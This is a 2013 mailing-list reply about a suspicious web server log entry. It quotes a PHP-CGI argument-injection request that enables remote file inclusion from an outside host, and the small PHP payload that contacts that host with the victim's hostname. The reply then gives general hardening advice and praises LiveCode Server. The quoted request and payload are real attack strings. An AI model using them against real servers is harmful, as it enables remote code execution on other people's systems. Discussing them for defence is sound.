[OT] server log entry?

Richard Gaskin ambassador at fourthworld.com
Fri May 24 12:51:12 EDT 2013 

Thierry Douez wrote:
> Here is the line:
>
> 193.107.17.36 ... "GET
> /?-n+-dallow_url_include%3DOn+-dauto_prepend_file%3Dhttp://
> gofastdownload.com/rf/s.txt HTTP/1.1" 200 6027 "-" "Python-urllib/2.6"
>
> The file ../rf/s.txt  contains:
>
> <?php file_get_contents('
> http://gofastdownload.com/rf/s.php?d='.$_SERVER['HTTP_HOST']); exit(0);
?>
>
> The IP point in the middle of nowhere in Russia.
>
> and finally I know nothing about php.
...
> If someone has some more precise answer, I"m still interested :)

I don't have anything more specific on that, but I find it interesting 
that it appears to have been successful (result code 200).

On most Apache and auth logs you'll find a great many attempts at all 
sorts of exploits, and most fail simply because the file they're looking 
for isn't there, or has been adequately protected against such attacks.

As a general rule I try to stay current with all server components 
(MySQL, PHP, any frameworks like Wordpress, Drupal, etc.), and most of 
the time staying current blocks malicious bots.

That said, security is an ongoing process of cat and mouse, and no 
matter how frequently system components are updated there's always some 
new exploit being devised and deployed.

I don't know enough about Python or your system setup to suggest how to 
prevent that specific attack, but in general if you move your CGI 
engines outside of the public HTML folder, lock down permissions as 
tightly as practical, and religiously sanitize inputs you can greatly 
minimize such risks.

One more thing in favor of LiveCode Server:  until LC really takes off 
we get a minor benefit from "security by obscurity" - that is, it simply 
isn't worth most attackers' time to target LC because it's seldom used 
on the Web.

Moreover, the LC engine has historically been immune to buffer overruns, 
so a wide range of potential exploits that have affected other 
components are very unlikely to affect LC.

And being a very readable language, it's often easier to maintain good 
sanitization practices with LC.

--
  Richard Gaskin
  Fourth World
  LiveCode training and consulting: http://www.fourthworld.com
  Webzine for LiveCode developers: http://www.LiveCodeJournal.com
  Follow me on Twitter:  http://twitter.com/FourthWorldSys

More information about the use-livecode mailing list